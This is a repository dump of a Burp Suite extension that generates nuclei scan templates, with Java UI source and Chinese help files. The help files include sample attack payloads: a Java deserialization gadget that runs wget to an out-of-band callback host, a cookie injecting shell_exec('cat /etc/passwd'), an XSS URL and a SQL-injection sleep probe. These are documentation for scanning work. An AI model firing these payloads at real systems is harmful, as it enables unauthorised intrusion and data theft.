├── .github └── workflows │ └── ci.yml ├── .gitignore ├── 1.png ├── LICENSE ├── README.md ├── format_help_docs.py ├── help1.txt ├── help2.txt ├── pom.xml └── src └── main └── java └── burp ├── BurpExtender.java └── utils └── Config.java /.github/workflows/ci.yml: -------------------------------------------------------------------------------- 1 | name: Java CI 2 | 3 | on: 4 | create: 5 | tags: 6 | - v* 7 | 8 | jobs: 9 | build: 10 | runs-on: ubuntu-latest 11 | 12 | steps: 13 | - uses: actions/checkout@v2 14 | 15 | - name: Set up JDK 17 16 | uses: actions/setup-java@v2 17 | with: 18 | java-version: '17' 19 | distribution: 'adopt' 20 | 21 | - name: Build with Maven 22 | run: mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V 23 | 24 | - name: Upload JAR file 25 | uses: actions/upload-artifact@v2.3.1 26 | with: 27 | name: burp_nu_te_gen_Releases.zip 28 | path: target/Nu_Te_Gen-*-SNAPSHOT-jar-with-dependencies.jar 29 | 30 | - name: Zip the Build 31 | run: cd target && zip -r ../burp_nu_te_gen_Releases.zip Nu_Te_Gen-*-SNAPSHOT-jar-with-dependencies.jar 32 | 33 | - name: Create Release 34 | id: create_release 35 | uses: actions/create-release@v1 36 | env: 37 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 38 | with: 39 | tag_name: ${{ github.ref }} 40 | release_name: Release ${{ github.ref }} 41 | body: TODO New Release. 42 | draft: false 43 | prerelease: false 44 | 45 | - name: Upload Release Asset 46 | uses: actions/upload-release-asset@v1 47 | env: 48 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 49 | with: 50 | upload_url: ${{ steps.create_release.outputs.upload_url }} 51 | asset_path: ./burp_nu_te_gen_Releases.zip 52 | asset_name: burp_nu_te_gen_Releases.zip 53 | asset_content_type: application/zip 54 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | **/.DS_Store 2 | .idea 3 | /target 4 | push.sh 5 | format_*.txt -------------------------------------------------------------------------------- /1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ffffffff0x/burp_nu_te_gen/71376538d5e4fb5c8e82a7b22ec9431792b82b5a/1.png -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # burp_nu_te_gen 2 | 3 | nuclei模版生成插件 4 | 5 | 仅用于生成所需模版 6 | 7 | 效果 8 | 9 | ![](./1.png) 10 | -------------------------------------------------------------------------------- /format_help_docs.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | def format_file(filename): 4 | formatted_lines = [] 5 | with open(filename, 'r', encoding='utf-8') as file: 6 | lines = file.readlines() 7 | for line in lines: 8 | line = line.rstrip('\r\n') 9 | line = '"' + line.replace('"', '\\"') + '\\n" +' 10 | formatted_lines.append(line) 11 | 12 | # 删除文本尾部的空行 13 | while formatted_lines and not formatted_lines[-1].strip(): 14 | formatted_lines.pop() 15 | 16 | # 替换最后一行的结尾 17 | if formatted_lines: 18 | formatted_lines[-1] = formatted_lines[-1].replace('\\n" +', '\\n";') 19 | 20 | # 添加前缀并写入新文件 21 | new_filename = f"format_{filename}" 22 | with open(new_filename, 'w', encoding='utf-8', newline='\n') as new_file: 23 | for line in formatted_lines: 24 | new_file.write(line + '\n') 25 | 26 | # 处理 help1.txt 和 help2.txt 27 | files_to_format = ['help1.txt', 'help2.txt'] 28 | for file in files_to_format: 29 | if os.path.exists(file): 30 | format_file(file) 31 | print(f"文件 {file} 格式化完成!") 32 | else: 33 | print(f"文件 {file} 不存在。") 34 | 35 | -------------------------------------------------------------------------------- /help1.txt: -------------------------------------------------------------------------------- 1 | 官方文档:https://docs.projectdiscovery.io/templates/introduction 2 | 3 | nuclei 2.9.1 版本更新了模板格式。如果使用的是较旧的 nuclei 版本,可能无法解析新的模板格式。 4 | 建议将 nuclei 版本升级至 2.9.1 或更高版本以确保正确解析模板格式。 5 | 6 | ===========================示例模板=========================== 7 | id: template-id 8 | 9 | info: 10 | name: Template Name 11 | author: test 12 | severity: info 13 | description: 漏洞详情描述 14 | reference: 15 | - https://Template.nuclei.sh 16 | # 元数据节点,与 uncover 集成的格式如下:-query: '' 17 | metadata: 18 | max-request: 2 19 | fofa-query: 'body="公司"' 20 | shodan-query: 'vuln:CVE-2021-26855' 21 | hunter-query: 'web.body="公司"' 22 | tags: tags 23 | 24 | # 自定义模版变量,自2.6.9版本开始支持 25 | variables: 26 | first_1: "{{rand_int(8, 20)}}" 27 | first_2: "{{rand_int(100, 101)}}" 28 | 29 | http: 30 | # 解析 raw 格式请求 31 | - raw: 32 | - |- 33 | POST /{{Path}} HTTP/1.1 34 | Host: {{Hostname}} 35 | Content-Type: application/json 36 | 37 | {"username":{{username}},"password":{{password}}} 38 | 39 | attack: clusterbomb # 定义HTTP模糊攻击类型,可用类型: batteringram,pitchfork,clusterbomb 40 | payloads: 41 | username: 42 | - 'admin' 43 | password: 44 | - 'admin' 45 | # header: helpers/wordlists/header.txt 46 | Path: 47 | - 'api/selectContentManagePage' 48 | 49 | matchers-condition: and 50 | matchers: 51 | - type: dsl 52 | dsl: 53 | - "contains(body, 'pageSize')" 54 | - "contains(body_1, 'pageSize') && contains(body_2, 'pageNum')" 55 | - "contains_all(body_1, 'pageSize', 'pageNum')" #单个body包内指定多个匹配关键字 56 | - "contains(header, 'application/json')" 57 | - "status_code == 200" 58 | - "status_code_1 == 404 && status_code_2 == 200" 59 | 60 | # 检查Cookie的MD5校验和是否包含在大写的请求体中 61 | - "contains(toupper(body), md5(cookie))" 62 | condition: and 63 | 64 | - type: dsl 65 | dsl: 66 | # 检测相应包的长度 67 | - "len(body_1) != 0" 68 | # 基于DSL的持续时间匹配器,当响应时间与定义的持续时间匹配时返回true,示例为大于等于6秒 69 | - 'duration>=6' 70 | condition: and 71 | 72 | # 匹配变量 73 | - type: word 74 | part: body 75 | words: 76 | - "{{first_2}}" 77 | 78 | # Interactsh匹配器,需要和使用 {{interactsh_response}} 79 | # 可匹配 interactsh_protocol、interactsh_request和 interactsh_response 三处 80 | 81 | # 确认HTTP交互 82 | - type: word 83 | part: interactsh_protocol 84 | words: 85 | - "http" 86 | 87 | # 确认检索/etc/passwd文件 88 | - type: regex 89 | part: interactsh_request 90 | regex: 91 | - "root:[x*]:0:0:" 92 | 93 | # 确认DNS交互 94 | - type: word 95 | part: interactsh_response 96 | words: 97 | - "dns" 98 | 99 | # 二进制流匹配 100 | - type: binary 101 | binary: 102 | - "504B0304" # zip archive 103 | - "526172211A070100" # RAR archive version 5.0 104 | - "FD377A585A0000" # xz tar.xz archive 105 | condition: or # 指定单个匹配器内多个条件的与或关系 106 | part: body 107 | 108 | - type: word 109 | encoding: hex 110 | words: 111 | - "50494e47" 112 | part: body 113 | 114 | # 否定匹配器,对匹配器结果进行取反 115 | - type: word 116 | words: 117 | - "PHPSESSID" 118 | part: header 119 | negative: true 120 | 121 | extractors: 122 | - type: regex 123 | # 为提取的信息命名,方便调用,可省略 124 | name: api 125 | part: body 126 | # 避免在终端中打印提取的值,使用动态变量时必须添加此标志 127 | internal: true 128 | regex: 129 | - "(?m)[0-9]{3,10}\\.[0-9]+" 130 | 131 | ----------------------------分割线---------------------------- 132 | # 嵌套表达式 133 | ❌ {{url_decode({{base64_decode('SGVsbG8=')}})}} 134 | ✔ {{url_decode(base64_decode('SGVsbG8='))}} 135 | 136 | # 如果需要在 extractor 中使用,比如将 extractor 提取的变量值 test 进行处理 137 | {{url_decode(base64_decode('{{test}}'))}} 138 | 139 | ----------------------------分割线---------------------------- 140 | # 自 Nuclei v2.3.6 发行以来,Nuclei 支持使用 interact.sh API 内置自动请求关联来实现基于 OOB 的漏洞扫描 141 | http: 142 | - raw: 143 | - | 144 | GET /plugins/servlet/oauth/users/icon-uri?consumerUri={{interactsh-url}} HTTP/1.1 145 | Host: {{Hostname}} 146 | 147 | ----------------------------分割线---------------------------- 148 | # JAVA反序列化: https://docs.nuclei.sh/template-guide/helper-functions#deserialization-helper-functions 149 | http: 150 | - raw: 151 | - | 152 | POST /index.faces;jsessionid=x HTTP/1.1 153 | Host: {{Hostname}} 154 | Content-Type: application/x-www-form-urlencoded 155 | 156 | javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}} 157 | 158 | ----------------------------分割线---------------------------- 159 | # 发送一个GET请求 160 | http: 161 | - method: GET 162 | path: 163 | - "{{BaseURL}}/actuator/env" 164 | - "{{BaseURL}}/login" 165 | - "{{BaseURL}}/thumbs.db" 166 | - "{{BaseURL}}/.svn/wc.db" 167 | # 发送一些头部信息给服务器的示例 168 | headers: 169 | X-Client-IP: 127.0.0.1 170 | X-Remote-IP: 127.0.0.1 171 | X-Remote-Addr: 127.0.0.1 172 | X-Forwarded-For: 127.0.0.1 173 | X-Originating-IP: 127.0.0.1 174 | Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl" 175 | 176 | # skip-variables-check 可以使 nuclei 不要解析请求内容中 `{{` 为变量 177 | skip-variables-check: true 178 | 179 | # 如果模板中包含多个扫描路径,当第一个路径匹配成功时,会自动停止后续路径的扫描,这不会影响其他模板 180 | stop-at-first-match: true 181 | 182 | # 单位 bytes- 从服务器响应中读取的最大值 183 | max-size: 500 184 | 185 | ----------------------------分割线---------------------------- 186 | id: wp-related-post-xss 187 | 188 | http: 189 | # 发送一个POST请求 190 | - method: POST 191 | path: 192 | - '{{RootURL}}/wp-login.php' 193 | headers: 194 | Content-Type: application/x-www-form-urlencoded 195 | body: 'log={{username}}&pwd={{password}}&wp-submit=Log+In' 196 | 197 | - method: GET 198 | path: 199 | - '{{RootURL}}/wp-admin/admin.php?page=rp4wp_link_related&rp4wp_parent=156x%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3Ep' 200 | 201 | # cookie-reuse 参数为 true,在多个请求之间维护基于 cookie 的会话,该参数接受布尔类型的输入,默认值为 false。 202 | cookie-reuse: true 203 | 204 | # 请求条件与匹配器中的DSL表达式一起使用。它们允许逻辑表达式包含跨多个请求/响应的条件。 205 | # 在模板中添加 "req-condition: true" 选项。响应的属性可以使用 "<请求编号>" 后缀来引用特定的响应,例如 status_code_1、status_code_3 或 body_2。 206 | req-condition: true 207 | 208 | matchers-condition: and 209 | matchers: 210 | - type: dsl 211 | dsl: 212 | - "contains(header, 'text/html')" 213 | - "contains(body_1, '&action=edit') && contains(body_2, 'All Posts')" 214 | - "status_code == 200" 215 | condition: and 216 | 217 | ----------------------------分割线---------------------------- 218 | # @timeout 请求注解 219 | id: PrestaShop_Product_Comments_SQL_Injection_CVE-2020-26248 220 | 221 | http: 222 | - raw: 223 | - | 224 | # @timeout 是请求注解的一种,⽤于覆盖默认的请求超时时间 225 | @timeout: 20s 226 | GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1 227 | Host: {{Hostname}} 228 | 229 | matchers: 230 | - type: dsl 231 | dsl: 232 | - 'duration>=6 && status_code == 200' 233 | - 'contains(content_type, "application/json") && contains(body, "average_grade")' 234 | condition: and 235 | 236 | ----------------------------分割线---------------------------- 237 | # "self-contained"通常在批量检测API可用性时使用 238 | # 假设你通过信息泄露获得了一个API密钥,但不知道这个密钥属于哪个服务,也没有其他特征可供参考。这时,你只能逐个尝试各个官方API接口,看哪个平台能够成功验证该密钥。 239 | id: example-self-contained-input 240 | 241 | self-contained: true 242 | http: 243 | - raw: 244 | - | 245 | GET https://example.com:443/gg HTTP/1.1 246 | Host: example.com:443 -------------------------------------------------------------------------------- /help2.txt: -------------------------------------------------------------------------------- 1 | 官方文档:https://docs.projectdiscovery.io/templates/reference/helper-functions 2 | 3 | ----------------------------分割线---------------------------- 4 | # https://example.com:443/foo/bar.php 5 | 6 | {{BaseURL}} # https://example.com:443/foo/bar.php 7 | {{RootURL}} # https://example.com:443 8 | {{Hostname}} # example.com:443 9 | {{Host}} # example.com 10 | {{Port}} # 443 11 | {{Path}} # /foo 12 | {{File}} # bar.php 13 | {{Scheme}} # https 14 | 15 | ----------------------------分割线---------------------------- 16 | # 重点配置参数备忘: 17 | 18 | # skip-variables-check 可以使 nuclei 不要解析请求内容中 `{{` 为变量 19 | skip-variables-check: true 20 | 21 | # 如果模板中包含多个扫描路径,当第一个路径匹配成功时,会自动停止后续路径的扫描,这不会影响其他模板 22 | stop-at-first-match: true 23 | 24 | # 单位 bytes- 从服务器响应中读取的最大值 25 | max-size: 500 26 | 27 | # cookie-reuse 参数为 true,在多个请求之间维护基于 cookie 的会话,该参数接受布尔类型的输入,默认值为 false。 28 | cookie-reuse: true 29 | 30 | # req-condition 与 DSL表达式匹配器一起使用,它允许逻辑表达式包含跨多个请求/响应的条件 31 | # 在模板中添加 "req-condition: true" 选项,响应的属性可以使用 "<请求编号>" 后缀来引用特定的响应,例如 status_code_1、status_code_3 或 body_2 32 | req-condition: true 33 | 34 | redirects: true # 启用重定向 35 | max- redirects: 3 # 允许重定向的次数,默认值为 10 36 | 37 | ----------------------------分割线---------------------------- 38 | # 模板签名: 39 | 40 | # 从v3.0.0开始支持签名,未签名的模板默认会被禁用 41 | # 批量对模板进行签名 42 | nuclei -lfa -duc -sign -t /home/nuclei-templates 43 | 44 | ----------------------------分割线---------------------------- 45 | # 返回输入的长度 46 | 47 | {{len("Hello")}} 48 | {{len(5555)}} 49 | 50 | ----------------------------分割线---------------------------- 51 | # 随机字段 52 | 53 | {{randstr}} 54 | {{rand_int(10)}} 55 | 56 | ----------------------------分割线---------------------------- 57 | # 大小写转换 58 | 59 | {{to_lower("HELLO")}} #将输入转换为小写字符 60 | {{to_upper("hello")}} #将输入转换为大写字符 61 | 62 | ----------------------------分割线---------------------------- 63 | # 编码转换 64 | 65 | {{url_decode("https:%2F%2Fprojectdiscovery.io%3Ftest=1")}} #对输入字符串进行URL解码 66 | {{url_encode("https://projectdiscovery.io/test?a=1")}} #对输入字符串进行URL编码 67 | 68 | {{hex_decode("6161")}} 69 | {{hex_encode("aa")}} 70 | 71 | {{sha1("Hello")}} 72 | {{sha256("Hello")}} 73 | 74 | {{base64("Hello")}} 75 | {{base64(1234)}} 76 | {{base64_decode("SGVsbG8=")}} 77 | {{base64_py("Hello")}} #像Python一样将字符串编码为Base64(包含换行符) 78 | 79 | {{md5("Hello")}} 80 | {{md5(1234)}} 81 | 82 | ----------------------------分割线---------------------------- 83 | {{rand_base(5)}} 84 | {{rand_base(5, "abc")}} 85 | {{rand_char("abc")}} 86 | {{rand_char()}} 87 | {{rand_int()}} 88 | {{rand_int(1, 10)}} 89 | {{rand_text_alpha(10)}} 90 | {{rand_text_alpha(10, "abc")}} 91 | {{rand_text_alphanumeric(10)}} 92 | {{rand_text_alphanumeric(10, "ab12")}} 93 | {{rand_text_numeric(10)}} 94 | {{rand_text_numeric(10, 123)}} 95 | 96 | ----------------------------分割线---------------------------- 97 | # 验证字符串是否包含子字符串 98 | {{contains("Hello", "lo")}} 99 | 100 | ----------------------------分割线---------------------------- 101 | 102 | {{generate_java_gadget("commons-collections3.1", "wget {{interactsh-url}}", "base64")}} 103 | {{gzip("Hello")}} 104 | {{html_escape("test")}} 105 | {{html_unescape("<body>test</body>")}} 106 | {{mmh3("Hello")}} 107 | {{print_debug(1+2, "Hello")}} 108 | {{regex("H([a-z]+)o", "Hello")}} 109 | {{remove_bad_chars("abcd", "bc")}} 110 | {{repeat("../", 5)}} 111 | {{replace("Hello", "He", "Ha")}} 112 | {{replace_regex("He123llo", "(\\d+)", "")}} 113 | {{reverse("abc")}} 114 | {{trim("aaaHelloddd", "ad")}} 115 | {{trim_left("aaaHelloddd", "ad")}} 116 | {{trim_prefix("aaHelloaa", "aa")}} 117 | {{trim_right("aaaHelloddd", "ad")}} 118 | {{trim_space(" Hello ")}} 119 | {{trim_suffix("aaHelloaa", "aa")}} 120 | {{unix_time(10)}} 121 | {{wait_for(1)}} 122 | 123 | ----------------------------分割线---------------------------- 124 | # www.projectdiscovery.io 125 | 126 | {{FQDN}} # www.projectdiscovery.io 127 | {{RDN}} # projectdiscovery.io 128 | {{DN}} # projectdiscovery 129 | {{SD}} # www 130 | {{TLD}} # io -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | net.test 8 | Nu_Te_Gen 9 | 1.4.1-SNAPSHOT 10 | 11 | 12 | 13 | 14 | org.apache.maven.plugins 15 | maven-compiler-plugin 16 | 17 | 15 18 | 15 19 | 20 | 21 | 22 | 23 | 24 | org.apache.maven.plugins 25 | maven-assembly-plugin 26 | 2.4.1 27 | 28 | 29 | 30 | jar-with-dependencies 31 | 32 | 33 | 34 | 35 | burp.BurpExtender 36 | 37 | 38 | 39 | 40 | 41 | 42 | make-assembly 43 | 44 | package 45 | 46 | single 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | net.portswigger.burp.extender 58 | burp-extender-api 59 | LATEST 60 | 61 | 62 | org.apache.commons 63 | commons-text 64 | 1.10.0 65 | 66 | 67 | 68 | -------------------------------------------------------------------------------- /src/main/java/burp/BurpExtender.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | import burp.utils.Config; 4 | 5 | import java.awt.Component; 6 | import java.awt.event.ActionEvent; 7 | import java.awt.event.ActionListener; 8 | import java.io.PrintWriter; 9 | import javax.swing.*; 10 | import java.awt.*; 11 | import java.util.*; 12 | 13 | public class BurpExtender implements IBurpExtender, ITab, IHttpListener { 14 | private IBurpExtenderCallbacks callbacks; 15 | private IExtensionHelpers helpers; 16 | private JTabbedPane tabs; 17 | public PrintWriter stdout; 18 | 19 | boolean match_true; 20 | boolean match_word; 21 | boolean match_header; 22 | boolean match_status; 23 | boolean match_negative; 24 | boolean match_time; 25 | boolean match_size; 26 | boolean match_interactsh_protocol; 27 | boolean match_interactsh_request; 28 | boolean match_regex; 29 | boolean match_binary; 30 | boolean extractors; 31 | 32 | @Override 33 | public void registerExtenderCallbacks(final IBurpExtenderCallbacks callbacks) { 34 | //输出 35 | this.stdout = new PrintWriter(callbacks.getStdout(), true); 36 | this.stdout.println("hello Nu_Te_Gen!"); 37 | this.stdout.println("version:1.4"); 38 | 39 | // keep a reference to our callbacks object 40 | this.callbacks = callbacks; 41 | 42 | // obtain an extension helpers object 43 | helpers = callbacks.getHelpers(); 44 | 45 | // set our extension name 46 | callbacks.setExtensionName("Nu_Te_Gen V1.4"); 47 | 48 | // create our UI 49 | SwingUtilities.invokeLater(new Runnable() { 50 | @Override 51 | public void run() { 52 | 53 | // nuclei 模版生成界面 54 | // JSplitPane Nu_Te_Pane = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT); 55 | JPanel Nuc_jp1 = new JPanel(); 56 | Nuc_jp1.setLayout(new GridLayout(13, 1)); 57 | 58 | JButton Nuc_bt_1 = new JButton("生成"); 59 | JButton Nuc_bt_2 = new JButton("清空"); 60 | 61 | JLabel Nuc_lb_id = new JLabel("模版id:", SwingConstants.RIGHT); 62 | JTextField Nuc_tf_id = new JTextField(1); 63 | Nuc_tf_id.setText("test"); 64 | 65 | JLabel Nuc_lb_name = new JLabel("模版名称:", SwingConstants.RIGHT); 66 | JTextField Nuc_tf_name = new JTextField(1); 67 | Nuc_tf_name.setText("test"); 68 | 69 | JLabel Nuc_lb_author = new JLabel("作者名称:", SwingConstants.RIGHT); 70 | JTextField Nuc_tf_author = new JTextField(1); 71 | Nuc_tf_author.setText("ffffffff0x"); 72 | 73 | JLabel Nuc_lb_severity = new JLabel("严重程度:", SwingConstants.RIGHT); 74 | JComboBox Nuc_Tab_severity = new JComboBox(GetSeverityModes()); 75 | Nuc_Tab_severity.setMaximumSize(Nuc_Tab_severity.getPreferredSize()); 76 | Nuc_Tab_severity.setSelectedIndex(0); 77 | 78 | JLabel Nuc_lb_description = new JLabel("描述:", SwingConstants.RIGHT); 79 | JTextField Nuc_tf_description = new JTextField(1); 80 | Nuc_tf_description.setText("由插件自动生成"); 81 | 82 | JLabel Nuc_lb_tags = new JLabel("Tags:", SwingConstants.RIGHT); 83 | JTextField Nuc_tf_tags = new JTextField(1); 84 | Nuc_tf_tags.setText("auto"); 85 | 86 | JLabel Nuc_lb_req = new JLabel("请求方式:", SwingConstants.RIGHT); 87 | JComboBox Nuc_Tab_req = new JComboBox(GetReqModes()); 88 | Nuc_Tab_req.setMaximumSize(Nuc_Tab_req.getPreferredSize()); 89 | Nuc_Tab_req.setSelectedIndex(0); 90 | 91 | JLabel Nuc_lb_path = new JLabel("请求路径:", SwingConstants.RIGHT); 92 | JTextField Nuc_tf_path = new JTextField(1); 93 | Nuc_tf_path.setText(""); 94 | 95 | JLabel Nuc_lb_headers = new JLabel("Content-Type:", SwingConstants.RIGHT); 96 | JComboBox Nuc_Tab_headers = new JComboBox(GetHeadersModes()); 97 | Nuc_Tab_headers.setMaximumSize(Nuc_Tab_headers.getPreferredSize()); 98 | Nuc_Tab_headers.setSelectedIndex(0); 99 | 100 | JLabel Nuc_lb_body = new JLabel("body:", SwingConstants.RIGHT); 101 | JComboBox Nuc_Tab_body = new JComboBox(GetBodyModes()); 102 | Nuc_Tab_body.setMaximumSize(Nuc_Tab_headers.getPreferredSize()); 103 | Nuc_Tab_body.setSelectedIndex(0); 104 | 105 | JLabel Nuc_lb_redirects = new JLabel("是否跟随跳转:", SwingConstants.RIGHT); 106 | JComboBox Nuc_Tab_redirects = new JComboBox(GetRedirectsModes()); 107 | Nuc_Tab_redirects.setMaximumSize(Nuc_Tab_redirects.getPreferredSize()); 108 | Nuc_Tab_redirects.setSelectedIndex(0); 109 | 110 | JLabel Nuc_lb_redirects_num = new JLabel("跳转次数:", 